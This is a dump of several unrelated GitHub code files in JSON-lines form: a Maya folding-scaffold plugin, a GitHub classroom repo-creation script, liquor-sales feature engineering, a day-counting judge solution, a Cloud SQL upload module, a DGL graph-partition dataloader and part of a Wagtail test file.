MayaInputScaffoldWrapper = None\r\n\r\n # shapeTraverseOrder: List[str] = []\r\n # shapeBase = []\r\n # shapeResetTransforms = {}\r\n\r\n new_shapes = []\r\n\r\n prevNumHinges = -1\r\n prevShrinks = -1\r\n prevPushAxis = [-1, -1, -1] # TODO: make more generic\r\n\r\n # constructor\r\n def __init__(self):\r\n OpenMayaMPx.MPxNode.__init__(self)\r\n\r\n # compute\r\n def compute(self, plug, data):\r\n # Print the MDGContext\r\n context = data.context().isNormal()\r\n\r\n if (context == False):\r\n print(\"Context is not normal, returning\")\r\n return\r\n\r\n # TODO:: create the main functionality of the node. Your node should\r\n # take in three floats for max position (X,Y,Z), three floats\r\n # for min position (X,Y,Z), and the number of random points to\r\n # be generated. Your node should output an MFnArrayAttrsData\r\n # object containing the random points. Consult the homework\r\n # sheet for how to deal with creating the MFnArrayAttrsData.\r\n\r\n timeData = data.inputValue(self.inTime)\r\n time = timeData.asInt()\r\n\r\n numHingeData = data.inputValue(self.inNumHinges)\r\n numHinges = numHingeData.asInt()\r\n\r\n numShrinksData = data.inputValue(self.inNumShrinks) # TODO: Represents maximum allowed shrinks\r\n numShrinks = numShrinksData.asInt()\r\n\r\n # hardcode patches for now for an input scaffold which contains some mid level scaffolds in arbitrary order\r\n # patches = [\"cBase\", \"cFold\", \"cFold1\", \"cTop\", \"cFold2\", \"cTop1\", \"cFold3\", \"cFold4\", \"cTop2\"]\r\n # patches = [\"pBaseBottomH\", \"pFoldH\", \"pBaseTopH\"]\r\n # patches = [\"mBase\", \"mFold1\", \"mFold2\", \"mTop\", \"mFold3\", \"mTop1\"]\r\n # patches = [\"dBase\", \"dFold1\", \"dFold2\", \"dTop\"]\r\n patches = [\"gBase\", \"gFold1\", \"gFold2\", \"gBase1\", \"gFold3\", \"gBase2\"]\r\n # patches = [\"lBase\", \"lFold\", \"lBase1\"]\r\n\r\n # b1Patches = [\"mBase\", \"mFold1\", \"mTop\"]\r\n # b2Patches = [\"mBase\", \"mFold2\", \"mTop\"]\r\n\r\n # hard code push axis\r\n pushAxis = [0, -1, 0]\r\n\r\n recreatePatches = False\r\n # TODO: maybe only need to create a new MayaInputScaffoldWrapper if patches, pushAxis, numHinges, numShrinks has changed\r\n if (self.prevNumHinges != numHinges or self.prevShrinks != numShrinks or self.prevPushAxis != pushAxis):\r\n # Reset variables\r\n self.prevNumHinges = numHinges\r\n self.prevShrinks = numShrinks\r\n self.prevPushAxis = pushAxis\r\n\r\n # Current Scaffolds should clear their patches from the scene, if there is one\r\n if (self.defaultInputScaffWrapper != None):\r\n self.defaultInputScaffWrapper.cleanUpSplitPatches()\r\n\r\n # Create new MayaInputScaffoldWrapper\r\n self.defaultInputScaffWrapper = None\r\n self.defaultInputScaffWrapper = MayaInputScaffoldWrapper(patches, OpenMaya.MVector(pushAxis[0], pushAxis[1],\r\n pushAxis[2]), numHinges,\r\n numShrinks)\r\n self.defaultInputScaffWrapper.genConnectivityInfo()\r\n self.defaultInputScaffWrapper.genInputScaffold()\r\n self.defaultInputScaffWrapper.genBasicScaffolds()\r\n\r\n # TODO: For testing purposes, hard code solutions and don't calling this yet\r\n self.defaultInputScaffWrapper.genFoldSolutions()\r\n\r\n recreatePatches = True\r\n\r\n # always perform this step regardless\r\n # TODO: figure out the foldMain.py before calling this\r\n self.defaultInputScaffWrapper.fold(time, recreatePatches)\r\n\r\n data.setClean(plug)\r\n\r\n\r\n# initializer\r\ndef nodeInitializer():\r\n tAttr = OpenMaya.MFnTypedAttribute()\r\n nAttr = OpenMaya.MFnNumericAttribute()\r\n\r\n # TODO:: initialize the input and output attributes. Be sure to use the\r\n # MAKE_INPUT and MAKE_OUTPUT functions\r\n\r\n try:\r\n print(\"Initialization!\\n\")\r\n foldableNode.inTime = nAttr.create(\"inTime\", \"t\", OpenMaya.MFnNumericData.kInt, 0)\r\n MAKE_INPUT(nAttr)\r\n\r\n foldableNode.inNumHinges = nAttr.create(\"numHinges\", \"nH\", OpenMaya.MFnNumericData.kInt, 3)\r\n MAKE_INPUT(nAttr)\r\n\r\n foldableNode.inNumShrinks = nAttr.create(\"numShrinks\", \"nS\", OpenMaya.MFnNumericData.kInt, 1)\r\n MAKE_INPUT(nAttr)\r\n\r\n # defaultList = OpenMaya.MFnStringArrayData().create()\r\n # foldableNode.inStringList = tAttr.create(\"initialPatches\", \"iP\", OpenMaya.MFnStringArrayData.kStringArray,\r\n # defaultList)\r\n # MAKE_INPUT(tAttr)\r\n\r\n foldableNode.outPoint = tAttr.create(\"outPoint\", \"oP\", OpenMaya.MFnArrayAttrsData.kDynArrayAttrs)\r\n MAKE_OUTPUT(tAttr)\r\n\r\n except Exception as e:\r\n print(e)\r\n sys.stderr.write((\"Failed to create attributes of %s node\\n\", kPluginNodeTypeName))\r\n\r\n try:\r\n # TODO:: add the attributes to the node and set up the\r\n # attributeAffects (addAttribute, and attributeAffects)\r\n foldableNode.addAttribute(foldableNode.inTime)\r\n foldableNode.addAttribute(foldableNode.inNumHinges)\r\n foldableNode.addAttribute(foldableNode.inNumShrinks)\r\n # foldableNode.addAttribute(foldableNode.inStringList)\r\n foldableNode.addAttribute(foldableNode.outPoint)\r\n\r\n foldableNode.attributeAffects(foldableNode.inTime, foldableNode.outPoint)\r\n foldableNode.attributeAffects(foldableNode.inNumHinges, foldableNode.outPoint)\r\n foldableNode.attributeAffects(foldableNode.inNumShrinks, foldableNode.outPoint)\r\n # foldableNode.attributeAffects(foldableNode.inStringList, foldableNode.outPoint)\r\n\r\n except Exception as e:\r\n print(e)\r\n sys.stderr.write((\"Failed to add attributes of %s node\\n\", kPluginNodeTypeName))\r\n\r\n\r\n# creator\r\ndef nodeCreator():\r\n return OpenMayaMPx.asMPxPtr(foldableNode())\r\n\r\n\r\n# initialize the script plug-in\r\ndef initializePlugin(mobject):\r\n mplugin = OpenMayaMPx.MFnPlugin(mobject)\r\n try:\r\n mplugin.registerNode(kPluginNodeTypeName, foldableNodeId, nodeCreator, nodeInitializer)\r\n except:\r\n sys.stderr.write(\"Failed to register node: %s\\n\" % kPluginNodeTypeName)\r\n\r\n # Load menu\r\n print(\"Executing Command...\\n\")\r\n OpenMaya.MGlobal.executeCommand(\"source \\\"\" + mplugin.loadPath() + \"/unhingedDialogue.mel\\\"\")\r\n\r\n\r\n# uninitialize the script plug-in\r\ndef uninitializePlugin(mobject):\r\n mplugin = OpenMayaMPx.MFnPlugin(mobject)\r\n\r\n OpenMaya.MGlobal.executeCommand(\"source \\\"\" + mplugin.loadPath() + \"/removeMenu.mel\\\"\")\r\n\r\n try:\r\n mplugin.deregisterNode(foldableNodeId)\r\n except:\r\n sys.stderr.write(\"Failed to unregister node: %s\\n\" % kPluginNodeTypeName)\r\n","repo_name":"dluisnothere/660-unhinged","sub_path":"foldableNodeV2.py","file_name":"foldableNodeV2.py","file_ext":"py","file_size_in_byte":52326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29641036592","text":"import argparse\nimport distutils.util\n\nimport github\nimport requests\nfrom colorama import Fore, Style\n\nfrom classroom_tools import github_utils\nfrom classroom_tools.verifications import repo_is_template\n\nparser = argparse.ArgumentParser('Create test repositories')\nparser.add_argument(\n '--token',\n required=True,\n help='GitHub personal access token with repo and workflow permissions'\n)\nparser.add_argument(\n '--template_repo_fullname',\n required=True,\n help='Template repo used to create student repositories in format: OrgName/RepoName'\n)\nparser.add_argument(\n '--org_name',\n required=True,\n help='GitHub organization with student repositories (for multiples student repositories)'\n)\nparser.add_argument(\n '--repo_name',\n required=True,\n help='Name of the repo to be created'\n)\nparser.add_argument(\n '--private',\n type=lambda v: True if distutils.util.strtobool(v) else False,\n required=True,\n help='Repository privacy'\n)\nparser.add_argument(\n '--admin_collaborators',\n nargs='*',\n default=[],\n help='Collaborator usernames to receive admin access'\n)\nparser.add_argument(\n '--write_collaborators',\n nargs='*',\n default=[],\n help='Collaborator usernames to receive write access'\n)\nparser.add_argument(\n '--team_name',\n help='Team name to receive write access'\n)\n\n\ndef create_repo_from_template(token, template_repo_fullname, org_name, repo_name, description='', private=False):\n res = requests.post(\n url=f'https://api.github.com/repos/{template_repo_fullname}/generate',\n headers={\n 'Authorization': f'token {token}',\n 'Accept': 'application/vnd.github.baptiste-preview+json'\n },\n json={\n 'owner': org_name,\n 'name': repo_name,\n 'description': description,\n 'private': private\n }\n )\n if res.ok:\n print(f'{Fore.GREEN}Created repo: {repo_name}')\n else:\n g = github.Github(login_or_token=token)\n try:\n g.get_repo(full_name_or_id=f'{org_name}/{repo_name}')\n print(f'{Fore.YELLOW}Repo already exists: {repo_name}')\n except github.UnknownObjectException:\n print(f'{Fore.RED}Failed to create repo: {repo_name}')\n raise Exception(res.text)\n\n\ndef main(args):\n print('\\n\\n' + 'Creating student repositories'.center(80, '='))\n args = parser.parse_args(args)\n print('Args:\\n' + ''.join(f'\\t{k}: {v}\\n' for k, v in vars(args).items()))\n github_utils.verify_token(args.token)\n try:\n create_repo_from_template(\n token=args.token,\n template_repo_fullname=args.template_repo_fullname,\n org_name=args.org_name,\n repo_name=args.repo_name,\n description='Student repository',\n private=args.private\n )\n g = github.Github(login_or_token=args.token)\n repo = g.get_repo(full_name_or_id=f'{args.org_name}/{args.repo_name}')\n for col in args.admin_collaborators:\n repo.add_to_collaborators(col, permission='admin')\n for col in args.write_collaborators:\n repo.add_to_collaborators(col, permission='push')\n for team in g.get_organization(args.org_name).get_teams():\n if team.name == args.team_name:\n team.set_repo_permission(repo=repo, permission='push')\n\n except Exception as e:\n print(e)\n repo_is_template.main(['--token', args.token, '--repo_fullname', args.template_repo_fullname])\n\n\nif __name__ == '__main__':\n import sys\n\n main(sys.argv[1:])\n print(Style.RESET_ALL)\n","repo_name":"ClassroomSuite/ClassroomTools","sub_path":"classroom_tools/student_repositories/create_student_repo.py","file_name":"create_student_repo.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23247296635","text":"import pandas as pd\r\nimport numpy as np\r\nimport holidays\r\n\r\nclass LiquorSalesFeatureEngineer:\r\n def __init__(self, df):\r\n self.df = df\r\n \r\n def add_holiday_flags_working(self):\r\n # Ensure 'year' and 'month' columns are of type int\r\n \r\n self.df['year'] = self.df['year'].astype(int)\r\n self.df['month'] = self.df['month'].astype(int)\r\n #years = df['year'].unique().tolist() \r\n\r\n # Retrieve US holidays for the unique years in the dataset\r\n us_holidays = holidays.UnitedStates(years=list(self.df['year'].unique()))\r\n\r\n # Using dictionary comprehension to create a map of year-month to holidays in that month\r\n month_holiday_map = {(date.year, date.month): holiday for date, holiday in us_holidays.items()}\r\n\r\n # Add flags for major US holidays\r\n self.df['is_new_year'] = self.df.apply(lambda x: 1 if month_holiday_map.get((x['year'], x['month']), None) == \"New Year's Day\" else 0, axis=1)\r\n self.df['is_independence_day'] = self.df.apply(lambda x: 1 if month_holiday_map.get((x['year'], x['month']), None) == \"Independence Day\" else 0, axis=1)\r\n self.df['is_christmas'] = self.df.apply(lambda x: 1 if month_holiday_map.get((x['year'], x['month']), None) == \"Christmas Day\" else 0, axis=1)\r\n self.df['is_thanksgiving'] = self.df.apply(lambda x: 1 if month_holiday_map.get((x['year'], x['month']), None) == \"Thanksgiving\" else 0, axis=1)\r\n\r\n return self.df\r\n\r\n\r\n def add_holiday_flags(self): \r\n self.df['is_new_year'] = self.df.apply(lambda x: 1 if x['month'] == 1 else 0, axis=1)\r\n self.df['is_independence_day'] = self.df.apply(lambda x: 1 if x['month'] == 7 else 0, axis=1)\r\n self.df['is_christmas'] = self.df.apply(lambda x: 1 if x['month'] == 12 else 0, axis=1)\r\n self.df['is_thanksgiving'] = self.df.apply(lambda x: 1 if x['month'] == 11 else 0, axis=1)\r\n return self.df\r\n\r\n \r\n def add_seasonality_working(self):\r\n # Seasonality for Mid-west USA\r\n conditions = [\r\n (self.df['month'].isin([12, 1, 2, 3])), # Long winter\r\n (self.df['month'].isin([4, 5])), # Spring\r\n (self.df['month'].isin([6, 7, 8])), # Summer\r\n (self.df['month'].isin([9, 10, 11])) # Fall\r\n ]\r\n\r\n seasons = ['winter', 'spring', 'summer', 'fall']\r\n\r\n self.df['season'] = np.select(conditions, seasons, default='unknown')\r\n \r\n return self.df\r\n \r\n def add_seasonality(self):\r\n # Seasonality for Mid-west USA\r\n conditions = [\r\n (self.df['month'].isin([12, 1, 2, 3])), # Long winter\r\n (self.df['month'].isin([4, 5])), # Spring\r\n (self.df['month'].isin([6, 7, 8])), # Summer\r\n (self.df['month'].isin([9, 10, 11])) # Fall\r\n ]\r\n\r\n seasons = ['winter', 'spring', 'summer', 'fall']\r\n\r\n self.df['season'] = np.select(conditions, seasons, default='unknown')\r\n\r\n # Adding one-hot encoded season columns\r\n self.df['is_winter'] = np.where(self.df['season'] == 'winter', 1, 0)\r\n self.df['is_spring'] = np.where(self.df['season'] == 'spring', 1, 0)\r\n self.df['is_summer'] = np.where(self.df['season'] == 'summer', 1, 0)\r\n self.df['is_fall'] = np.where(self.df['season'] == 'fall', 1, 0)\r\n\r\n return self.df\r\n \r\n \r\n def add_profit(self):\r\n self.df['profit'] = ( self.df['state_bottle_retail'] - self.df['state_bottle_cost']) * self.df['bottles_sold']\r\n self.df['profit'] = self.df['profit'].astype(float)\r\n \r\n def transform(self):\r\n self.add_holiday_flags()\r\n self.add_seasonality()\r\n self.add_profit()\r\n return self.df\r\n\r\n# Usage:\r\n#feature_engineer = LiquorSalesFeatureEngineer(df)\r\n#df_transformed = feature_engineer.transform()\r\n","repo_name":"kathiresanrs/iForecast-ProductDemandForecasting","sub_path":"feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"403294690","text":"# URI Online Judge | 2139\n# ano bissexto -- natal no dia 360\nwhile True:\n try:\n dias31 = [1, 3, 5, 7, 8, 10, 12]\n dias30 = [4, 6, 9, 11]\n mes, dia = [int(x) for x in input().split()]\n if mes == 12 and dia == 24:\n print('E vespera de natal!')\n elif mes == 12 and dia == 25:\n print('E natal!')\n elif mes == 12 and dia >25:\n print('Ja passou!')\n else:\n dias = 0\n for i in range(1, mes):\n if i in dias31:\n dias += 31\n elif i in dias30:\n dias+= 30\n else:\n dias+= 29\n dias+= dia \n print(f'Faltam {360-dias} dias para o natal!')\n except EOFError:\n break","repo_name":"sammycosta/uri-python","sub_path":"uri_2139.py","file_name":"uri_2139.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71741642794","text":"\"\"\"\nThis update_psql module uses 2 functions to connect and update to the GCP Cloud SQL PostgreSQL database.\nFor now, this serves no real purpose other than training me to interact with a SQL database in Python.\n\nFunctions:\n - conn_to_psql : Connects to the GCP Cloud SQL PostgreSQL database.\n - upload_to_psql : Uploads data to the GCP Cloud SQL PostgreSQL database.\n\"\"\"\n\n\nimport logging\n\nimport os\nfrom google.cloud.sql.connector import Connector\nimport pandas as pd\nimport sqlalchemy\nfrom modules.gcp_interactions import get_secret\n\n\n\n\nPROJECT_ID = os.environ[\"PROJECT_ID\"]\nSQL_INSTANCE_CONNECTION_NAME1 = get_secret(PROJECT_ID, \"SQL_INSTANCE_CONNECTION_NAME1\")\nSQL_DB_USER1 = get_secret(PROJECT_ID, \"SQL_DB_USER1\")\nSQL_DB_PASS1 = get_secret(PROJECT_ID, \"SQL_DB_PASS1\")\nSQL_DB_NAME1 = get_secret(PROJECT_ID, \"SQL_DB_NAME1\")\nSQL_DB_TABLE_NAME1 = get_secret(PROJECT_ID, \"SQL_DB_TABLE_NAME1\")\n\n\ndef conn_to_psql():\n \"\"\"Connects to the GCP Cloud SQL PostgreSQL database\"\"\"\n \n logging.info(\"Connecting to database...\")\n \n connector = Connector()\n\n def getconn_SQL():\n conn = connector.connect(\n SQL_INSTANCE_CONNECTION_NAME1,\n \"pg8000\",\n user=SQL_DB_USER1,\n password=SQL_DB_PASS1,\n db=SQL_DB_NAME1,\n )\n return conn\n\n # create connection pool with 'creator' argument to our connection object\n try:\n pool = sqlalchemy.create_engine(\n \"postgresql+pg8000://\",\n creator=getconn_SQL,\n )\n logging.info(\"Connection successfull!\")\n except Exception as e:\n logging.warning(f\"Connection to GCP database failed!\\nThis exception was raised : {e}\")\n \n return pool, connector\n\n\ndef upload_to_psql(pool):\n \"\"\"Upload data to the GCP Cloud SQL PostgreSQL database\"\"\"\n \n logging.info(\"Uploading data to GCP database...\")\n \n df_final_data = pd.read_csv(\"data/final_data.csv\")\n df_final_data.to_sql(SQL_DB_TABLE_NAME1, pool, if_exists=\"replace\", index=False)\n\n # Verify data has been inserted\n query = f\"SELECT * FROM {SQL_DB_TABLE_NAME1}\"\n result = pd.read_sql(query, pool)\n if result is not None:\n logging.info(\"Data inserted.\")\n print(\"SQL query result : \\n\")\n print(result)\n\ndef close_conn_to_sql(pool, connector):\n \"\"\"Closes the connection to the GCP Cloud SQL PostgreSQL database\"\"\"\n \n logging.info(\"Closing connection to database...\")\n \n connector.close() # clean up the Connector object only used to authenticate the user\n pool.dispose() # close the database connections managed by the connection pool\n \n logging.info(\"Connection closed.\")","repo_name":"AlexandreGarito/data-pipeline-demo-1","sub_path":"modules/update_psql.py","file_name":"update_psql.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70844861994","text":"import torch\nimport dgl\nimport numpy\nimport time\nfrom itertools import islice\nfrom statistics import mean\nfrom multiprocessing import Manager, Pool\nfrom multiprocessing import Process, Value, Array\nfrom graph_partitioner import Graph_Partitioner\nfrom my_utils import gen_batch_output_list\nfrom draw_graph import draw_graph, generate_interactive_graph\n\ndef unique_tensor_item(combined):\n\tuniques, counts = combined.unique(return_counts=True)\n\treturn uniques.type(torch.long)\n\n\ndef unique_edges(edges_list):\n\ttemp = []\n\tfor i in range(len(edges_list)):\n\t\ttt = edges_list[i] # tt : [[],[]]\n\t\tfor j in range(len(tt[0])):\n\t\t\tcur = (tt[0][j], tt[1][j])\n\t\t\tif cur not in temp:\n\t\t\t\ttemp.append(cur)\n\t# print(temp) # [(),(),()...]\n\tres_ = list(map(list, zip(*temp))) # [],[]\n\tres = tuple(sub for sub in res_)\n\treturn res\n\n\ndef generate_random_mini_batch_seeds_list(OUTPUT_NID, args):\n\t'''\n\tParameters\n\t----------\n\tOUTPUT_NID: final layer output nodes id (tensor)\n\targs : all given parameters collection\n\n\tReturns\n\t-------\n\t'''\n\tselection_method = args.selection_method\n\tmini_batch = args.batch_size\n\tfull_len = len(OUTPUT_NID) # get the total number of output nodes\n\tif selection_method == 'random':\n\t\tindices = torch.randperm(full_len) # get a permutation of the index of output nid tensor (permutation of 0~n-1)\n\telse: #selection_method == 'range'\n\t\tindices = torch.tensor(range(full_len))\n\n\toutput_num = len(OUTPUT_NID.tolist())\n\tmap_output_list = list(numpy.array(OUTPUT_NID)[indices.tolist()])\n\tbatches_nid_list = [map_output_list[i:i + mini_batch] for i in range(0, len(map_output_list), mini_batch)]\n\tweights_list = []\n\tfor i in batches_nid_list:\n\t\ttemp = len(i)/output_num\n\t\tweights_list.append(len(i)/output_num)\n\t\t\n\treturn batches_nid_list, weights_list\n\n\ndef get_global_graph_edges_ids_2(raw_graph, cur_subgraph):\n\tsrc = cur_subgraph.edges()[0]\n\tdst = cur_subgraph.edges()[1]\n\t\n\tsrc = src.long()\n\tdst = dst.long()\n\t\n\traw_src, raw_dst = cur_subgraph.ndata[dgl.NID]['_N_src'][src], cur_subgraph.ndata[dgl.NID]['_N_dst'][dst]\n\n\tglobal_graph_eids_raw = raw_graph.edge_ids(raw_src, raw_dst)\n\t# https://docs.dgl.ai/en/0.4.x/generated/dgl.DGLGraph.edge_ids.html#dgl.DGLGraph.edge_ids\n\n\treturn global_graph_eids_raw, (raw_src, raw_dst)\n\n\ndef get_global_graph_edges_ids(raw_graph, cur_block):\n\t'''\n\t\tParameters\n\t\t----------\n\t\traw_graph : graph\n\t\tcur_block: (local nids, local nids): (tensor,tensor)\n\n\t\tReturns\n\t\t-------\n\t\tglobal_graph_edges_ids: [] current block edges global id list\n\t'''\n\n\tsrc, dst = cur_block.all_edges(order='eid')\n\tsrc = src.long()\n\tdst = dst.long()\n\t# print(src.tolist())\n\t# print(dst.tolist())\n\traw_src, raw_dst = cur_block.srcdata[dgl.NID][src], cur_block.dstdata[dgl.NID][dst]\n\t# print(raw_src.tolist())\n\t# print(raw_dst.tolist())\n\tglobal_graph_eids_raw = raw_graph.edge_ids(raw_src, raw_dst)\n\t# https://docs.dgl.ai/en/0.4.x/generated/dgl.DGLGraph.edge_ids.html#dgl.DGLGraph.edge_ids\n\n\treturn global_graph_eids_raw, (raw_src, raw_dst)\n\n\ndef generate_one_block(raw_graph, global_eids, global_srcnid):\n\t'''\n\n\tParameters\n\t----------\n\tG global graph DGLGraph\n\teids cur_batch_subgraph_global eid tensor int64\n\n\tReturns\n\t-------\n\n\t'''\n\t_graph = dgl.edge_subgraph(raw_graph, global_eids)\n\tedge_dst_list = _graph.edges()[1].tolist()\n\tdst_local_nid_list = list(set(edge_dst_list))\n\tnew_block = dgl.to_block(_graph, dst_nodes=torch.tensor(dst_local_nid_list, dtype=torch.long))\n\n\tglobal_nid_list = _graph.ndata[dgl.NID].tolist()\n\tblock_nid_list = new_block.ndata[dgl.NID]['_N'].tolist()\n\tblock_dst_nid_list = new_block.dstdata[dgl.NID].tolist()\n\n\tfinal_nid_list = [global_nid_list[i] for i in block_nid_list] # mapping global graph nid <--- block local nid\n\tfinal_dst_nid_list = [global_nid_list[i] for i in block_dst_nid_list]\n\n\tnew_block.ndata[dgl.NID] = {'_N': torch.tensor(final_nid_list, dtype=torch.long)}\n\tnew_block.dstdata[dgl.NID] = torch.tensor(final_dst_nid_list, dtype=torch.long)\n\tnew_block.srcdata[dgl.NID] = torch.tensor(final_nid_list, dtype=torch.long)\n\n\treturn new_block\n\ndef check_connections_0(batched_nodes_list, current_layer_subgraph):\n\tres=[]\n\t\n\t# multi-layers model: current_layer_subgraph, here\n\tsrc_nid_list = current_layer_subgraph.srcdata['_ID'].tolist()\n\t# print('\\n ************************************* src nid of current layer subgraph')\n\t# print(src_nid_list)\n\tdict_nid_2_local = {src_nid_list[i]: i for i in range(0, len(src_nid_list))}\n\t# print('\\n ************************************* dict_nid_2_local')\n\teids_global_list = current_layer_subgraph.edata['_ID'].tolist()\n\t\n\n\tfor step, output_nid in enumerate(batched_nodes_list):\n\t\t# print(step, ' -----------------------------------------------step ')\n\t\t# in current layer subgraph, only has src and dst nodes,\n\t\t# and src nodes includes dst nodes, src nodes equals dst nodes.\n\t\tgiven_nid_list_ = output_nid\n\t\t# given_nid_list_ = output_nid.tolist()\n\t\tlocal_given_output_nids = list(map(dict_nid_2_local.get, given_nid_list_))\n\t\tlocal_in_edges_tensor = current_layer_subgraph.in_edges(local_given_output_nids, form='all')\n\n\t\t# get local srcnid and dstnid from subgraph\n\t\tmini_batch_srcid_local_list = list(local_in_edges_tensor)[0].tolist()\n\t\tsrcid_list = list(numpy.array(src_nid_list)[mini_batch_srcid_local_list])\n\t\t# map local srcnid , dstnid, eid to global\n\t\teid_local_list = list(local_in_edges_tensor)[2]\n\t\teid_list = list(numpy.array(eids_global_list)[eid_local_list.tolist()])\n\t\tglobal_eid_tensor = torch.tensor(eid_list, dtype=torch.long)\n\t\tsrcid = torch.tensor(list(set(given_nid_list_+ srcid_list)), dtype=torch.long)\n\t\t\n\n\t\tres.append((srcid, output_nid, global_eid_tensor))\n\t# print('res----------------------------------------')\n\t# print(len(shared_list))\n\treturn res\n\n\ndef generate_blocks_for_one_layer(raw_graph, block_2_graph, batches_nid_list):\n\n\tblocks = []\n\tcheck_connection_time = []\n\tblock_generation_time = []\n\n\tt1= time.time()\n\tbatches_temp_res_list = check_connections_0(batches_nid_list, block_2_graph)\n\tt2 = time.time()\n\tcheck_connection_time.append(t2-t1) #------------------------------------------\n\tsrc_list=[]\n\tdst_list=[]\n\n\tfor step, (srcnid, dstnid, current_block_global_eid) in enumerate(batches_temp_res_list):\n\t\t# print('batch ' + str(step) + '-' * 30)\n\t\tt_ = time.time()\n\t\tcur_block = generate_one_block(raw_graph, current_block_global_eid, srcnid)\n\t\tt__=time.time()\n\t\tblock_generation_time.append(t__-t_) #------------------------------------------\n\t\t\n\t\tblocks.append(cur_block)\n\t\tsrc_list.append(srcnid)\n\t\tdst_list.append(dstnid)\n\n\t\t# data_loader.append((srcnid, dstnid, [cur_block]))\n\t\t\n\t# print(\"\\nconnection checking time \" + str(sum(check_connection_time)))\n\t# print(\"total of block generation time \" + str(sum(block_generation_time)))\n\t# print(\"average of block generation time \" + str(mean(block_generation_time)))\n\tconnection_time = sum(check_connection_time)\n\tblock_gen_time = sum(block_generation_time)\n\tmean_block_gen_time = mean(block_generation_time)\n\n\n\treturn blocks, src_list,dst_list,(connection_time, block_gen_time, mean_block_gen_time)\n\n\n\ndef generate_dataloader_w_partition(raw_graph, block_to_graph_list, args):\n\tfor layer, block_to_graph in enumerate(block_to_graph_list):\n\t\t\n\t\tcurrent_block_eidx, current_block_edges = get_global_graph_edges_ids_2(raw_graph, block_to_graph)\n\t\tblock_to_graph.edata['_ID'] = current_block_eidx\n\t\tif layer == 0:\n\t\t\tmy_graph_partitioner=Graph_Partitioner(block_to_graph, args) #init a graph partitioner object\n\t\t\tbatched_output_nid_list,weights_list,batch_list_generation_time, p_len_list=my_graph_partitioner.init_graph_partition()\n\n\t\t\tprint('partition_len_list')\n\t\t\tprint(p_len_list)\n\t\t\targs.batch_size=my_graph_partitioner.batch_size\n\t\t\t\n\t\t\tblocks, src_list, dst_list, time_1 = generate_blocks_for_one_layer(raw_graph, block_to_graph, batched_output_nid_list)\n\t\t\tconnection_time, block_gen_time, mean_block_gen_time = time_1\n\t\t\t# batch_list_generation_time = t1 - tt\n\t\t\ttime_2 = (connection_time, block_gen_time, mean_block_gen_time, batch_list_generation_time)\n\t\telse:\n\t\t\treturn\n\tdata_loader=[]\n\t# TODO\n\treturn data_loader, weights_list, time_2\n\ndef gen_grouped_dst_list(prev_layer_blocks):\n\tpost_dst=[]\n\tfor block in prev_layer_blocks:\n\t\tsrc_nids = block.srcdata['_ID'].tolist()\n\t\tpost_dst.append(src_nids)\n\treturn post_dst # return next layer's dst nids(equals prev layer src nids)\n\ndef generate_dataloader_wo_gp_Pure_range(raw_graph, block_to_graph_list, args):\n\tdata_loader=[]\n\tweights_list=[]\n\tnum_batch=0\n\tblocks_list=[]\n\tfinal_dst_list =[]\n\tfinal_src_list=[]\n\tprev_layer_blocks=[]\n\tt_2_list=[]\n\t# prev_layer_src_list=[]\n\t# prev_layer_dst_list=[]\n\tfor layer, block_to_graph in enumerate(block_to_graph_list):\n\t\tif layer ==0:\n\t\t\tcurrent_block_eidx, current_block_edges = get_global_graph_edges_ids_2(raw_graph, block_to_graph)\n\t\t\tblock_to_graph.edata['_ID'] = current_block_eidx\n\t\t\tdst_nids=block_to_graph.dstdata['_ID'].tolist()\n\t\t\t# src_nids=block_to_graph.srcdata['_ID'].tolist()\n\t\t\t# print('time of batches_nid_list generation : ' + str(t1 - tt) + ' sec')\n\t\t\tt1=time.time()\n\t\t\tindices = [i for i in range(len(dst_nids))]\n\t\t\tbatched_output_nid_list, w_list=gen_batch_output_list(dst_nids,indices,args.batch_size)\n\t\t\ttt=time.time()\n\t\t\tweights_list=w_list\n\t\t\tnum_batch=len(batched_output_nid_list)\n\t\t\tprint('layer ', layer)\n\t\t\tprint('\\tselection method range initialization spend ', time.time()-t1)\n\t\t\t# block 0 : (src_0, dst_0); block 1 : (src_1, dst_1);.......\n\t\t\tblocks, src_list, dst_list,time_1 = generate_blocks_for_one_layer(raw_graph, block_to_graph, batched_output_nid_list)\n\t\t\tconnection_time, block_gen_time, mean_block_gen_time = time_1\n\t\t\tbatch_list_generation_time = tt - t1\n\t\t\ttime_2 = [connection_time, block_gen_time, mean_block_gen_time, batch_list_generation_time]\n\t\t\tt_2_list.append(time_2)\n\t\t\tprev_layer_blocks=blocks\n\t\t\t# prev_layer_dst_list=dst_list\n\t\t\t# prev_layer_src_list=src_list\n\n\t\t\tblocks_list.append(blocks)\n\t\t\tfinal_dst_list=dst_list\n\n\t\telse:\n\t\t\tcurrent_block_eidx, current_block_edges = get_global_graph_edges_ids_2(raw_graph, block_to_graph)\n\t\t\tblock_to_graph.edata['_ID'] = current_block_eidx\n\t\t\toutput_nids=block_to_graph.dstdata['_ID']\n\t\t\t# print('time of batches_nid_list generation : ' + str(t1 - tt) + ' sec')\n\t\t\tt1=time.time()\n\t\t\t\n\t\t\tgrouped_output_nid_list=gen_grouped_dst_list(prev_layer_blocks)\n\t\t\ttt=time.time()\n\t\t\tprint('layer ',layer)\n\t\t\tprint('\\tselection method range initialization spend ', time.time()-t1)\n\t\t\t\n\t\t\tblocks, src_list, dst_list, time_1 = generate_blocks_for_one_layer(raw_graph, block_to_graph, grouped_output_nid_list)\n\t\t\tconnection_time, block_gen_time, mean_block_gen_time = time_1\n\t\t\tbatch_list_generation_time = tt-t1\n\t\t\ttime_2 = [connection_time, block_gen_time, mean_block_gen_time, batch_list_generation_time]\n\t\t\tt_2_list.append(time_2)\n\n\t\t\tif layer 512)\n\n def test_choices_updated_from_streamfield_on_save(self):\n self.assertEqual(\n ','.join(self.field_choices),\n self.choice_field.choices\n )\n\n new_choices = ['this', 'is', 'new']\n self.choice_field.skip_logic = skip_logic_data(new_choices)\n 